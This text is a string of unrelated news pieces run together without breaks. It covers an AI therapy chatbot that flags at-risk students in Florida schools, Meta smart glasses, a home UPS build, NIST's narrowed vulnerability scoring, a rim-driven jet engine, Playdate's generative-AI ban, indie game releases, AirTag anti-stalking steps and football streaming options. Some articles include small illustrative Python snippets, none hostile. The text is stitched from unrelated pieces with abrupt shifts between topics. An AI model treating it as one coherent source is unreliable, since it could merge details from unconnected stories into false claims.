Brittani Phillips checked her phone. A middle school counselor in Putnam County, Florida, Phillips receives messages from an artificial intelligence-enabled therapy platform that students use during nonschool hours. It flags when a student may be at risk for harming themself or others based on what the student types into a chat.
Phillips saw that this was a “severe” alert for an eighth grader.
So Phillips spent her evening on the phone with the student’s mom, asking questions to figure out what was going on and how vulnerable the student was. Phillips also called the police, she says, noting that she tells students that the chats are confidential until they can’t be.
That was last school year, in the spring.
“He’s alive and well. He’s in ninth grade this year,” Phillips says. She believes that the interaction built trust between her and the family. When the student passes her in the hall now, he makes a point to greet her, she adds.
Navigating budget shortfalls and limited mental health staff, Interlachen Jr.-Sr. High School, where Phillips works, is using an AI platform to vet students’ mental health needs.
Phillips’ district has used Alongside, an automated student monitoring system, for three years. It’s an example of the growing category of tools that are marketed to K-12 schools for similar purposes, with at least 9 companies getting funding deals since 2022.
Alongside says its tool is used by more than 200 schools around the US and argues that its platform offers better services than typical telehealth options because it has a social and emotional skill-building chat tool — where students talk through their life problems with a llama called Kiwi that tries to teach them to build up resilience — and its AI-generated content is monitored by clinicians. The system offers resource-strapped schools, especially in rural areas, access to critical mental health resources, company representatives say.
Many experts and families also worry that students attach to AI too strongly. Even as a recent national survey found that 20 percent of high schoolers have used AI romantically or know someone who has, there’s significant interest in keeping students from emotionally connecting with bots. That even includes a proposed federal law that would force AI companies to remind students that chatbots aren’t real people.
Still, in her job, Phillips says the tool her school uses is exceptional at putting out the “small fires.” With around 360 middle schoolers to support, having this tool to hand-hold them through the breakups and other routine problems they face allows her to focus her time with students nearing crisis. Plus, students sometimes find it easier to turn to AI for dealing with emotional problems, she says.
On the Digital Couch
Student nervousness plays into why they are comfortable confiding in these technologies, school counselors say.
Speaking with a mental health professional can be intimidating, especially for adolescents, says Sarah Caliboso-Soto, a licensed clinical social worker who serves as the assistant director of clinical programs at the USC Suzanne Dworak-Peck School of Social Work and the clinical director for the Trauma Recovery Center and Telebehavioral Health at USC.
There’s a generational component as well. For students who’ve grown up encountering chat interfaces through social media and websites, AI interfaces can feel familiar. And kids today find that it’s easier to text than call someone on the phone, says Linda Charmaraman, director of the Youth, Media & Wellbeing Research Lab at Wellesley Centers for Women.
Using AI to work through emotions also allows students to avoid watching facial expressions, which they may worry will carry judgment, she adds. Also, chatbots are available at times when a human might not be, without the hassle of having to make an appointment, Charmaraman says.
“It’s almost more natural than interacting with another human being,” Caliboso-Soto says.
In her work with a telehealth clinic, Caliboso-Soto has seen a rise in crisis text lines and chat lines. The clinic doesn’t use AI of any kind, she says, but it often gets approached by companies looking to get AI into the therapy sessions as notetakers.
It’s not necessarily bad in Caliboso-Soto’s opinion. For resource-strapped schools, AI can be used “as a first line of defense,” regularly checking in with students and pointing them in the right direction when they need more help, she says.
The starting price for a school to use Alongside’s services is about $10 per student per year, according to the company. Larger districts usually receive volume-based discounts.
But Caliboso-Soto worries about using AI as a substitute counselor. It lacks the discernment that clinicians provide when interacting with students, she notes. While large language models can be trained to notice symptoms in text, they cannot see or hear what a human clinician can when interacting with a student, the inflections of the voice and the movements of the body, nor can they reliably catch subtle observations or behaviors. “You can’t replace human connection, human judgment,” she adds.
While AI can speed up the diagnostic process or free up time for school counselors, it’s crucial not to overly rely on it for mental health, says Charmaraman. The technology can miss some of the nuances that a human counselor would catch, and it can give students unrealistic positive reinforcement. Schools need to adopt a holistic approach that includes families and caregivers, she argues.
Plus, if a school is increasingly using AI intervention to filter serious cases, it’s worth paying attention to whether students are having less frequent contact with clinically-trained humans, Caliboso-Soto says.
For its part, Alongside representatives say that the platform is not meant as a replacement for human therapy. The app is a stepping stone to seeking help from adults, says Ava Shropshire, a junior at Washington University who serves as a youth adviser for Alongside. She argues that the app makes mental health and social-emotional learning feel more normal for students and can lead them to seek out human help.
Still, some students think it’s at best a Band-Aid.
Social Accountability
“Can you think of another time in history when people have been so lonely, when our communities have been so weak?” asks Sam Hiner, executive director of The Young People’s Alliance, a North Carolina-based organization that lobbies for more youth participation in politics and policymaking.
During a time of economic upheaval, technology and social media have manipulated and isolated students from one another, and that’s led to a deep yearning for community and belonging, Hiner says.
Students will get it wherever they can, even if that’s through ChatGPT, he adds.
The Young People’s Alliance released a framework for regulating AI that allows for some therapeutic uses of the technology.
But in general, the organization is striving to rebuild the human community and is set against use of AI when it threatens to replace human companionship, Hiner says. “That’s a critical aspect of therapy and of living a fulfilled life and having social connection and having mental well-being,” he adds.
So for Hiner, the main concern is what’s called a “parasocial relationship,” when students develop a one-sided emotional attachment, especially when the technology enters schools for therapeutic purposes. It might be valuable to have an AI that can provide feedback or conduct analysis, even related to mental health, but Hiner says that the AI should not hint or convey that it has its own emotional state — for instance, saying “I’m proud of you” to a student user — because that encourages attachment.
Even though platforms often claim to decrease loneliness, they don’t really measure whether people are more connected and are more set up to live fulfilled, connected, happy lives in the long term, says Hiner: “All [tech platforms are] measuring is whether this bot is serving as an effective crutch for the immediate feelings of loneliness that they’re experiencing.”
What advocates want to prevent is these bots fueling the loss of social skills because they pull people away from relationships with other people, where they have social accountability, Hiner says.
Pushing Boundaries
Privacy experts note that these chatbots do not generally carry the same privacy protections as conversations with a licensed therapist. And when concerns about student privacy and encounters with the police are high, use of these tools raises “messy” privacy concerns, even when supervised by people with clinical training, a privacy law expert says.
Both the company and Phillips, the counselor in Putnam County, stress that, to work, these systems need human oversight. Phillips feels like this tool is an improvement over other monitoring tools the district has used, which point students toward in-school discipline rather than mental health help.
This school year, Phillips had logged 19 “severe” alerts from the AI health tool as of February (from a total of 393 active users). The company doesn’t break the incidents down by student, so some of those 19 “severe” alerts come from the same students, Phillips notes.
Phillips has learned, in using the tool, that it takes a human to perceive teenage humor, too.
That’s because some alerts aren’t genuine. On occasion, middle school students — usually boys — will test the boundaries of this technology, Phillips says. They type “my uncle touches me” or “my mom beat me with a pole” into the chat to test whether Phillips will follow up on it.
These boys are just trying to see if anyone is listening, to test whether anyone cares, she says. Sometimes, they just find it funny.
When she pulls them aside to discuss it, she can observe their body language, and whether it changes, which might suggest that the comment was real. If it was a joke, they often become apologetic. When a student doesn’t seem remorseful, Phillips will call and let the parents know what happened. But even in these cases, Phillips feels she has more options than provided by other monitoring systems, which would refer the student to in-school suspension.
Because Phillips is keeping her eye on the interactions, the students also learn to trust that she’s actually monitoring the system, she adds.
And, she says, the number of boys who do test the system in that way goes down every year.
Every time I’ve written about Meta’s AI-enabled glasses, I invariably get asked these questions: Why do you even want these? Why do you want smart glasses that can play music or misidentify native flora in a weirdly cheery voice? I am a lifelong Ray-Ban Wayfarer wearer, and I’m also WIRED’s resident Meta wearer. I grab a pair of Meta glasses whenever I leave the house because I like being able to use one device instead of two or three on a walk. With Meta glasses, I can wear sunglasses and workout headphones in one!
Meta sold more than 7 million pairs in 2025. Take a look at any major outdoor or sporting event, and you’ll see more than a few people wearing these to record snippets for Instagram or TikTok. Meta’s partnership with EssilorLuxottica has made smart glasses accessible, stylish, and useful and is undoubtedly the reason why Google, and now Apple, are trying to horn in on the market. After the notable flop that is the Apple Vision Pro, Apple is recalibrating its face-wearable strategy, moving away from augmented reality (AR) toward simpler, display-less, and hopefully good-looking glasses.
That’s not to say that you shouldn’t be careful how you use these glasses. Meta doesn’t have the greatest track record on privacy, and the company has continued to push forward with policies that are questionable at best. Even if you’re not concerned that face recognition will allow Meta to target immigrants or enable stalkers to find their victims, at the very least, people really do not like the idea that you could start recording them at any moment.
Probably the biggest hurdle to wearing Meta glasses is that even doing so seems like a gross violation of the social contract. After all, these are Mark Zuckerberg’s “pervert glasses.” When I pop these on my head, I’ve had friends (and my spouse) recoil and say, “I have apps to warn me away from people like you.” The best part, though, is that Oakley and Ray-Ban already make really great sunglasses. Even if the battery runs out or you don’t use Meta AI at all, these are stellar at shading your eyes from the sun.
Last year, Meta upgraded the original Meta Ray-Ban Wayfarers that became a smash hit. These are Meta’s entry-level glasses, and they come in a variety of lens styles. You can order them with clear lenses, prescription lenses, transition lenses, or the OG sunglass lenses, as well as in a variety of fits, including standard, large, or high-bridge frames. Improvements to this generation include an upgrade to a 12-MP camera and up to eight hours of battery life; writer Boone Ashworth’s testing clocked in at five to six hours.
If you put a bunch of computers in charge of your house, it’s generally desirable to ensure their uptime is as close to 100% as possible. An uninterruptible power supply can help in this regard, which is why [Bill Collis] whipped one up for his Home Assistant setup.
[Bill]’s UPS is charged with one job—keeping the Home Assistant Green hub and an Xfinity XB7 cable modem online when the grid goes dark. The construction is relatively straightforward. When the grid is up, everything is powered via a Mean Well AC-DC 12 V power supply, while the power is also used to charge a 12.8 V 10 Ah lithium iron phosphate battery pack. When the grid goes out, the system switches over to running the attached hardware on pure battery power. A Victron BatteryProtect is used to automatically disconnect the load if the battery voltage drops too low. Meanwhile, a Shelly Plus Uni module is used to monitor battery voltage and system status, integrated right into Home Assistant itself.
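The low-voltage cutoff the Victron BatteryProtect performs in hardware boils down to a comparator with hysteresis. Here is a minimal sketch of that logic in Python; the disconnect and reconnect thresholds are illustrative assumptions for a 12.8 V LiFePO4 pack, not the settings from [Bill]’s build:

```python
# Sketch of a low-voltage disconnect with hysteresis, similar in spirit
# to what a Victron BatteryProtect does. Thresholds are assumed values
# for a 12.8 V LiFePO4 pack, not measurements from this project.

DISCONNECT_V = 11.6   # cut the load below this to protect the cells
RECONNECT_V = 12.4    # re-enable only once the pack has recovered

def update_load_state(battery_voltage: float, load_enabled: bool) -> bool:
    """Return whether the load should be powered, given the last state."""
    if load_enabled and battery_voltage < DISCONNECT_V:
        return False          # voltage sagged too far: disconnect
    if not load_enabled and battery_voltage >= RECONNECT_V:
        return True           # pack has recovered: reconnect
    return load_enabled       # otherwise hold the current state

# Example: a discharge followed by a recharge
states = []
enabled = True
for v in [13.2, 12.0, 11.5, 11.9, 12.4, 13.0]:
    enabled = update_load_state(v, enabled)
    states.append(enabled)
# states → [True, True, False, False, True, True]
```

The hysteresis gap between the two thresholds matters: without it, a sagging battery would rapidly toggle the load on and off around a single cutoff voltage.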
If you want to keep the basics of your smart home going at all times, something like this is a pretty simple way to go. We’ve featured some other great UPS builds in the past, too. If you’re whipping up your own hardware to keep your home or lab alive in the dark of night, don’t hesitate to notify the tipsline.
The National Institute of Standards and Technology will stop assigning severity scores to lower-priority vulnerabilities due to the growing workload from rising submission volumes.
Starting April 15, the service will only analyze and provide additional details (e.g., severity rating, product lists) for security issues that meet specific criteria related to the risk they pose.
The National Vulnerability Database (NVD) will still list all submitted vulnerabilities, but those considered low priority will have a severity rating only from the CVE Numbering Authority (CNA) that evaluated and submitted it.
In an announcement this week, the non-regulatory federal agency said it will only provide additional details for vulnerabilities that meet one of the following criteria:
are in CISA’s Known Exploited Vulnerabilities (KEV) catalog
affect U.S. federal government software
involve critical software as per Executive Order 14028
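The new triage policy reduces to a simple predicate over those three criteria. The sketch below is a hypothetical illustration of the rule, not NIST code; the record fields and CVE IDs are made up:

```python
# Hypothetical sketch of NIST's new NVD triage rule: a CVE gets full
# enrichment only if it matches one of the three published criteria.
# Field names and example CVE IDs are illustrative, not real NVD data.

def nvd_status(cve: dict, kev_catalog: set) -> str:
    """Classify a CVE as 'Enriched' or 'Not Scheduled' per the criteria."""
    if cve["id"] in kev_catalog:              # in CISA's KEV catalog
        return "Enriched"
    if cve.get("affects_federal_software"):   # affects U.S. federal software
        return "Enriched"
    if cve.get("critical_software_eo14028"):  # critical per EO 14028
        return "Enriched"
    return "Not Scheduled"

kev = {"CVE-2026-0001"}
exploited = {"id": "CVE-2026-0001"}
low_priority = {"id": "CVE-2026-9999"}
# nvd_status(exploited, kev) → "Enriched"
# nvd_status(low_priority, kev) → "Not Scheduled"
```

Everything that falls through to “Not Scheduled” still gets an NVD entry, just without NIST’s added severity score and product list.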
NIST explained that the decision was driven by the large number of submissions, which grew by 263% recently and continued to accelerate in 2026. The organization enriched 42,000 CVEs in 2025, but it can no longer keep up with the increasing volume.
NIST NVD is a public, centralized database of known software and hardware vulnerabilities, which also provides additional descriptions and analyses on top of the unique identifiers (CVE IDs) assigned by CNAs, such as vendors and the not-for-profit MITRE Corporation.
The point of enriching vulnerability details is to make CVE entries usable for risk management, including assigning severity scores, identifying affected product versions, classifying weaknesses, and providing links to advisories, patches, or related research.
NIST NVD is used universally by security researchers, software vendors, government agencies, IT professionals, journalists, and regular users seeking more information about a specific security issue.
“All submitted CVEs will still be added to the NVD. However, those that do not meet the criteria above will be categorized as ‘Not Scheduled,’” explains NIST.
“This will allow us to focus on CVEs with the greatest potential for widespread impact. While CVEs that do not meet these criteria may have a significant impact on affected systems, they generally do not present the same level of systemic risk as those in the prioritized categories.”
NIST admits that the new rules could let some potentially high-impact CVEs slip through. For this reason, the agency accepts enrichment requests for “any lowest priority CVEs” via email at ‘nvd@nist.gov.’
The lack of enrichment, or notable delays in providing it, had been noticeable since 2024, but the organization has now formally declared that it will focus on the most important entries.
Rim-driven thrusters turn the normal propeller-motor arrangement inside out; rather than mounting the motor at the center of the propeller, they use a large hollow motor, with the blades attached to the inside of the rotor. They’re mostly used in ship propellers, though there have been some suggestions to use them in electric aircraft. [Integza], always looking for new and unusual ways to create propulsion, took this idea and made it into a jet engine.
Rather than using an electric motor, the fan in this design is propelled by miniature rocket nozzles along the edge. The fan levitates on a layer of high-pressure gas between the fan rim and the housing. To prevent too much pressurized gas from escaping, the fan and housing needed to fit together closely, but with minimal friction. A prototype made out of acrylic and resin and powered by compressed air proved that the idea worked, but [Integza] wanted to make this a combustion-powered engine.
The full engine would be similar to a rocket engine, with the fan being the nozzle. The combustion chamber was built out of a brass fitting, and it burned propane in compressed air. The fan and housing were CNC-milled out of aluminium and brass, respectively. They worked well when powered with compressed air, but seized up when connected to the combustion chamber — the fan was thermally expanding and jamming in the housing. Progressively rounding down the edges of the fan failed to solve this, and a hole melted in the fan during one test. [Integza] machined a new fan, which he anodized to increase its heat resistance.
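The jamming is easy to estimate with the linear thermal expansion formula ΔL = α·L·ΔT. The fan diameter, temperature rise, and running clearance in the sketch below are assumed figures for illustration, not measurements from the build:

```python
# Rough estimate of why a heated aluminium fan can seize in its housing:
# thermal growth of the rim eats up the running clearance.
# All dimensions and temperatures here are assumptions for illustration.

ALPHA_ALUMINIUM = 23e-6   # linear expansion coefficient, 1/K (approx.)
diameter_mm = 60.0        # assumed fan diameter
delta_t_k = 300.0         # assumed temperature rise from combustion
clearance_mm = 0.2        # assumed radial gap between fan and housing

growth_mm = ALPHA_ALUMINIUM * diameter_mm * delta_t_k  # diametral growth
radial_growth_mm = growth_mm / 2

# 23e-6 * 60 * 300 ≈ 0.41 mm of diametral growth, i.e. ~0.21 mm at the
# radius: an assumed 0.2 mm radial gap closes completely, which is
# consistent with the fan expanding and jamming in the housing.
```

Even with these back-of-the-envelope numbers, it is clear why rounding down the fan edges was not enough and a more heat-tolerant fan was needed.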
To keep it from overheating, he sprayed water into the combustion chamber, creating steam and cooling the exhaust stream to a manageable temperature. The engine did work, though we do wonder whether the fan actually increases its thrust over that of the base rocket engine.
Panic, the company behind the tiny and excellent Playdate console, is taking a stand on generative AI. The company has published an AI disclosure that says as of this month, the Playdate Catalog “will no longer accept titles that use ‘Generative AI’ for art, audio, music, text, or dialog.” Panic does allow for developers to use AI assistance for coding, but also says that “we will flag any title as such and specify the extent that it was used (for example, “Lua debugging”) so the customer can decide whether to support it or not.”
This comes a day after Panic announced that Playdate season three was happening and would arrive later this year. For those who don’t recall, the Playdate includes a “season” worth of games when you buy it, 24 titles in total with two revealed every week. Season two came out last year with 12 games — but, as Game Developer notes, one of those games used generative AI for writing and coding. On Bluesky, someone asked Panic if it would disclose what games in season three used AI, and the company confirmed that it was a requirement for season three that developers not use AI for art, music, writing or coding.
Specifically, Panic says you can’t use large language models like ChatGPT or Google Gemini, AI image generators like Stable Diffusion or audio generators like MuseNet and Suno. Previously-approved games with generative AI will be allowed to stay on the catalog with a disclosure that indicates what exactly AI was used for. The company says these guidelines are “under constant discussion and is subject to change at any time.”
I recall seeing AI disclosures on games in the Playdate Catalog in the past, but it makes sense to be up-front and clear on exactly what Panic allows and what it will reject. That said, it’s fairly easy to sideload games onto a Playdate, so anyone who wants to use generative AI to make a game isn’t entirely out of luck — though distribution and discovery for Playdate owners will obviously be harder.
Welcome to our latest roundup of what’s going on in the indie game space. Once again, there are some neat new games for you to check out this weekend. We’ve got a bunch of updates and announcements for upcoming titles to tell you about too.
There have been a bunch of solid indie showcases lately (and highlights from another one to tell you about below). If you want to learn about a ton of other games ASAP, you might want to set your alarm pretty early on April 25.
Starting at 5AM ET that day, the latest edition of Indie Life Expo takes place on YouTube, Twitch, TikTok, Bilibili and elsewhere. This one will feature more than 200 games! A rapid-fire Indie Waves segment will power through 160 of them. Organizers received 1,100 submissions for this installment, so hats off to them for featuring a sizable percentage of those.
Before that, you can check out another showcase on April 21. Top Hat Studios Presents: Spring Showcase 2026 will start at noon ET on the publisher’s YouTube and Twitch channels.
The stream will feature Motorslice, Well Dweller and survival horror game Becrowned, as well as premieres and other Top Hat games. I’ve been looking forward to Motorslice, which has a May release window. I wager we’ll get a precise release date for that during this stream.
Meanwhile, there’s an interesting Steam event taking place soon. InterfaceX26 will run from April 27 until May 4. This one is focused on games that deal with made-up operating systems and other custom interfaces. Organizers have brought together more than 150 developers and publishers, who are asking Valve to introduce an official “Fake OS” tag for games on Steam.
Some neat games will be included in a sale and a showcase on May 2, including Blippo+, TR-49 and The Roottrees are Dead. Expect demos and relevant new releases too. Speaking of which…
New releases
We’ve been waiting a very long time for Replaced. This cyberpunk adventure from Sad Cat Studios and publisher Thunderful finally landed this week on Steam, GOG, Xbox on PC and Xbox Series X/S. It’s on Game Pass Ultimate and PC Game Pass. Otherwise, the base game costs $20. A supporter edition that includes the soundtrack is $25. It’ll hit the Epic Games Store at a later date.
The game was initially supposed to arrive in 2022. It certainly didn’t help that Sad Cat Studios was forced to relocate from Belarus to Cyprus after Russia’s invasion of Ukraine. But the game is finally here and it debuted to generally positive reviews.
Replaced is a 2.5D action platformer set in an alternate version of 1980s America, in which you play as an AI trapped in a human body that may or may not dream of electric sheep. I haven’t yet had a chance to properly jump into this gorgeous-looking game, but I’m hoping to do so this weekend.
Speaking of games I’ve long had on my wishlist, Gecko Gods arrived this week. I think I first clapped eyes on this around 2022. Various trailers charmed me with the idea of a puzzle exploration platformer that casts you in the role of a gecko that’s able to run along walls and ceilings.
I’ve played around 90 minutes of this one so far. I dig the look and the gecko is very cute (being able to customize its appearance is a nice touch). I love that you “collect” different types of bugs by eating them. It’s a fairly relaxing game, which is broadly what I need at the minute.
I think there are some issues here, though. I’ve explored two of the main five islands in the open world and it feels a bit sparse so far. The joy of being able to clamber up and around any object complicates things when it comes to more precise platforming sections. While the sailing sections are pretty, the boat is clunky to control on the choppy water. I ran into some mild technical issues as well on PS5 with occasional framerate dips and objects popping in. Hopefully, that’s something the developers at Inresin are able to address.
Gecko Gods — from publishers Super Rare Originals and Gamersky Games — is available now on Steam, PS5 and Nintendo Switch. It’s normally $20, but there’s a 10 percent launch discount until April 30 (on PS5, this only applies to PlayStation Plus members).
Another highly anticipated game landed this week in the form of Mouse: PI for Hire. We’ve had our eyes on this first-person shooter/detective game with sumptuous rubberhose-style animation for quite some time. Reviews have been generally positive so far, and it seems that there’s enough substance here to live up to those stellar visuals.
Thirsty Suitors developer Outerloop Games and co-publisher Outersloth served up the cooking-themed Dosa Divas this week. It tells the story of two sisters who set out on a journey with their mech to take down a fast food empire and reconnect communities through cooking.
It caught my eye when I saw it during a showcase a while back and it has a great concept, though I don’t exactly love turn-based combat. I’ve read a few lukewarm reviews of the game, and the consensus seems to be that the cooking mechanics and combat perhaps needed some more time to simmer.
If you’d like to try Dosa Divas yourself, you can pick it up on Steam, Xbox Series X/S, PS5, Nintendo Switch and Switch 2. It’ll usually run you $20, but there’s a 10 percent launch discount until April 28.
If you’re looking for a puzzle game that can be relaxing or rather dark, depending on your mood, it might be worth checking out A Storied Life: Tabitha. As you pack up the home of a late loved one, you’ll need to decide which items to keep in the limited storage space you have and discard the rest. You’ll need to wrap fragile items in bubble wrap and vacuum pack soft items to save room in the boxes.
As you save items, you’ll unlock words that you can use to fill in the blanks of your loved one’s life and tell their story, Mad Libs-style. Given that you’ll find items like a blackmail letter and a shirt with lipstick on the collar, it seems like there’s a lot of variety to the kinds of stories you can tell.
A Storied Life: Tabitha is available on Steam now. It’ll normally run you $15, but you can save 10 percent if you buy it before April 28.
To round out this section, I’ll quickly note that Hades 2 is out now on PS5 and Xbox Series X/S for $30, with a 20 percent launch discount. It’s on Game Pass Ultimate, Game Pass Premium and PC Game Pass too.
I bought Hades 2 when Supergiant Games brought it to Steam early access two years ago, telling myself I’d wait until the full game was out. But I still haven’t gotten around to it yet. There are always too many games tugging at my fragile attention span and Hades 2 faded into the background for me. I really ought to play it, I know!
Upcoming
I’m keeping an eye out for Agefield High: Rock the School from Refugium Games. This spiritual successor to Rockstar’s Bully is set to arrive this summer on Steam. It emerged this week that it will hit PS5 and Xbox Series X/S later in the year.
It’s a coming-of-age adventure in which you play as Sam, a young lad who has moved to a new school in the early 2000s. He wants to make his last few months of high school a time to remember.
There’s a branching narrative with multiple endings here — you can opt to go to classes and be a good student, or skip school and cause trouble. As a mostly rule-abiding student way back when, I’d be tempted to go for the latter. This seems like a bit of a life sim with a broad array of activities and ways to get into bother. I’m looking forward to it.
The latest edition of the Galaxies Showcase — yet another indie spotlight event — took place this week and The Backworld caught my attention. This is a Mother-inspired RPG from Numor Games and publisher Top Hat with charming art direction (yes, I did see that one character doing a Naruto run), an intriguing mix of characters and…
Oh no, why did the music stop? Why did it get so dark all of a sudden? What are these horrifying beasts that are chasing my character? Yup, there’s a heavy horror element here. Numor took inspiration from The Backrooms as well.
The Backworld will be released later this year. A demo just hit Steam.
A Study in Blue, from Relate Games, was another highlight of the Galaxies Showcase, thanks in large part to that impressive animation. This is a point-and-click adventure in which you play as two characters with complex pasts: private detective Kenneth and runaway Blue.
You’ll explore a semi-open world and solve crimes by collecting clues and calling out characters’ lies. There are three intertwined story acts and multiple endings. A Steam demo featuring a side quest from the main game that’ll take around two hours to complete is available now.
I’m always going to be interested in any game that riffs on The Legend of Zelda: A Link to the Past. Judging by this trailer, Elementallis developer AnKae Games seems to borrow quite a bit of the design language and other ideas from the SNES classic. Still, if you’re going to crib from anything, it may as well be the best game of all time.
This 2D action RPG, which is also published by Top Hat and has a heavier focus on elemental powers than A Link to the Past, looks very much like my kind of jam. It’s coming to Steam, GOG, Switch, PS4, PS5, Xbox Series X/S and Xbox One on April 28. Per the eShop listing, it’ll cost $18.
The biggest benefit of Apple’s AirTags is that they help you find your belongings, whether you’re looking for lost keys or keeping track of your luggage while traveling. But AirTags can also be used to track you without your knowledge.
AirTags work by combining built-in sensors, wireless signals and Apple’s wide Find My network to let you keep tabs on your valuables. If you ever lose your wallet with an AirTag inside, for example, you can use the Find My app to locate it on a map, have it play a sound to help you find it nearby, or mark it as “lost,” which allows other Find My users to help you find it.
One of the biggest complaints about AirTags, however, is that someone with malicious intent could easily slip one of the tiny tags into your bag and then track your movements without your consent. Multiple people have reported AirTag-related stalking incidents where the victims didn’t know the trackers were placed on them until much later.
Apple and Google (Android users have their own choice of Bluetooth trackers, such as the Moto Tag, which works with Google’s Find Hub) have since collaborated on an industry standard that alerts the user if a device is being used to track them without their knowledge. Thanks to this collaboration, Android users will be able to know if an AirTag is being used to track them, too.
Apple, for its part, has also made some changes in the past few years that improve the ability to detect an unwanted AirTag. In the initial rollout, an AirTag would make a sound three days after it’s separated from its paired device. Now, that duration is 8 to 24 hours. If you have unwanted tracking notifications enabled (which we’ll get to below), you’ll receive an audible alert.
We should note here that the new AirTag is 50% louder than the first-generation model, making it theoretically better at alerting you to an unwanted tracker. Apple has also said that the speaker on the second-gen AirTag is harder to remove than on the first-gen model, in case bad actors try to silence it.
Apple’s Find My helps you set up and track an AirTag. It can also help notify you if an unwanted tracker is detected.
Patrick Holland/CNET
Detecting unwanted trackers
To be able to detect unwanted trackers, first enable unwanted-tracking notifications. For AirTags or other Find My accessories, these pop-up notifications (e.g., “AirTag found moving with you”) are available on devices with iOS 14.5 or later. For other Bluetooth tracking devices, these notifications are enabled on iOS 17.5 or later.
You should enable Location Services, Find My iPhone, Bluetooth and Allow Notifications. Here’s how:
Head to Settings, then Privacy & Security, then Location Services and toggle it on.
After that, head to Settings, then Apple Account, select Find My and turn Find My iPhone on.
To enable Bluetooth, go to Settings, then Bluetooth and turn that on.
Then go to Settings, then Notifications, scroll down to Tracking Notifications and toggle on Allow Notifications. Make sure airplane mode is off, or you won’t receive tracking notifications.
What to do when you get the tracking notification
If you do get a notification like “Unknown tracker alert” or “Item detected near you,” tap it to try to find the unwanted AirTag. Tap Continue, then tap Play Sound or Find Nearby to locate the AirTag in question.
If it doesn’t play a sound or you’re unable to find it, the item may no longer be on your person. Apple suggests checking your other belongings or the area around you, just in case. If you want to review the notification at a later time, you can open the Find My app, tap Items and then tap Items Detected With You.
Be aware that “false positives” are common: notifications can be triggered simply because someone nearby has a tracker on them. If you’re traveling on a train, plane or bus, waiting in line or seated in a public space, a mistaken tracking alert could stem from glitches or high-density Bluetooth environments.
If you get an alert, though, it’s always a good idea to take it seriously and investigate what might be causing it.
If you do find an AirTag that doesn’t belong to you, hold the top of your iPhone near the tracker until you see a notification. Tap it, and this will launch a website that provides information like its serial number, the last four digits of the phone number or a blurred-out email address of its owner. If the AirTag is marked as “lost,” you may see a message with instructions on how to contact them.
If you’re concerned that the tracker is being used to monitor your movements and location, Apple advises taking a screenshot of the information above for your records. You can then disable the AirTag by pressing down on the back of the AirTag, turning it counterclockwise to remove the cover and removing the battery.
Of course, before making any of these changes, it’s important to come up with a safety plan, especially if you’re afraid you’re being tracked by a current or former abusive partner. Contact your local law enforcement if you feel like your safety is at risk, or the National Domestic Violence Hotline 800-799-SAFE (7233).
Can English Premier League leader Arsenal hold its nerve, or will second-place Man City take the chance to close the gap on the Gunners in this crucial title race showdown at the Etihad?
A victory on Sunday looks essential if Man City is to claim a sixth EPL title under manager Pep Guardiola. A win here would move City to within three points of Arsenal. The hosts can draw plenty of encouragement from their comfortable 2-0 win in last month’s League Cup final as they look to heap further pressure on the Gunners. That pressure may be starting to get to the league leaders.
While Arsenal’s 2-1 home defeat last Sunday against Bournemouth has given City renewed optimism that it can catch its title opponents, Mikel Arteta’s team nevertheless claimed a positive result in midweek. Arsenal’s goalless draw at the Emirates against Sporting Lisbon ensured its passage into the UEFA Champions League semifinals for the second season in a row.
Man City takes on Arsenal on Sunday, April 19, at the Etihad Stadium, with kickoff set for 4:30 p.m. BST. That makes it an 11:30 a.m. ET or 8:30 a.m. PT start in the US and Canada, and a 1:30 a.m. AEST kickoff in Australia in the early hours of Monday morning.
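Those conversions are easy to double-check with Python’s standard zoneinfo module; this quick sketch takes the 4:30 p.m. BST kickoff from the listing above and prints the local start time in each region:

```python
from datetime import datetime
from zoneinfo import ZoneInfo

# Kickoff: 4:30 p.m. on Sunday, April 19 (London is on BST, UTC+1, in April)
kickoff = datetime(2026, 4, 19, 16, 30, tzinfo=ZoneInfo("Europe/London"))

for tz in ("America/New_York", "America/Los_Angeles", "Australia/Sydney"):
    local = kickoff.astimezone(ZoneInfo(tz))
    print(f"{tz}: {local:%a %I:%M %p}")
```

Running it confirms the 11:30 a.m. ET, 8:30 a.m. PT and early-Monday 1:30 a.m. AEST start times listed above.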
Midfield star Declan Rice is set to start for Arsenal on Sunday. He recovered from an illness to star in the Gunners’ midweek 0-0 draw with Sporting Lisbon in the Champions League.
Catherine Ivill/AMA/Getty Images
How to watch Man City vs. Arsenal in the US without cable
Sunday’s crucial clash will be broadcast on NBC and streaming service Peacock. To catch the game live on Peacock, you’ll need a Peacock Premium or Premium Plus subscription.
Peacock offers two Premium plans, and after recent price increases, the ad-supported Premium plan costs $11 a month and the ad-free Premium Plus plan costs $17 a month.
How to watch the Premier League 2025-26 with a VPN
If you’re traveling abroad and want to keep up with Premier League action while away from home, a VPN can help enhance your privacy and security when streaming.
It encrypts your traffic and prevents your internet service provider from throttling your speeds, and can also be helpful when connecting to public Wi-Fi networks while traveling, adding an extra layer of protection for your devices and logins. VPNs are legal in many countries, including the US and Canada, and can be used for legitimate purposes such as improving online privacy and security.
However, some streaming services may have policies that restrict VPN use to access region-specific content. If you’re considering a VPN for streaming, check the platform’s terms of service to ensure compliance.
If you choose to use a VPN, follow the provider’s installation instructions to ensure you’re connected securely and in compliance with applicable laws and service agreements. Some streaming platforms may block access when a VPN is detected, so verify whether your streaming subscription allows VPN use.
Price: $78 for two years
Latest tests: No DNS leaks detected, 18% speed loss in 2025 tests
Jurisdiction: British Virgin Islands
Network: 3,000-plus servers in 105 countries
ExpressVPN is our current best VPN pick for people who want a reliable and safe VPN, and it works on a variety of devices. It’s normally $120 a year for its most popular plan (Advanced), but if you sign up for an annual subscription for $90, you’ll get three months free. That’s the equivalent of $6 a month.
Note that ExpressVPN offers a 30-day money-back guarantee.
Livestream Man City vs. Arsenal in the UK
This Sunday afternoon clash is exclusive to Sky Sports and will be shown on its Sky Sports Main Event channel. If you already have Sky Sports as part of your TV package, you can stream the game via its Sky Go app. Cord-cutters will want to set up a Now account and a Now Sports membership to stream the game.
Now TV
Sky’s standalone streaming service Now offers access to Sky Sports channels with a Now Sports membership. You can get a day of access for £15 or sign up to a monthly plan from £35 a month right now.
Livestream Man City vs. Arsenal in Canada
If you want to livestream EPL games in Canada this season, you’ll need to subscribe to Fubo. The service has secured exclusive rights to the Premier League and is broadcasting all 380 matches live.
Fubo
Fubo is the go-to destination for Canadians looking to watch the EPL, with exclusive streaming rights to every match. It currently costs CA$27 for the first month, then CA$31.50 per month from then on.
Livestream Man City vs. Arsenal in Australia
Livestreaming rights for the EPL are now with Stan Sport, which is showing all 380 matches live, including this game.
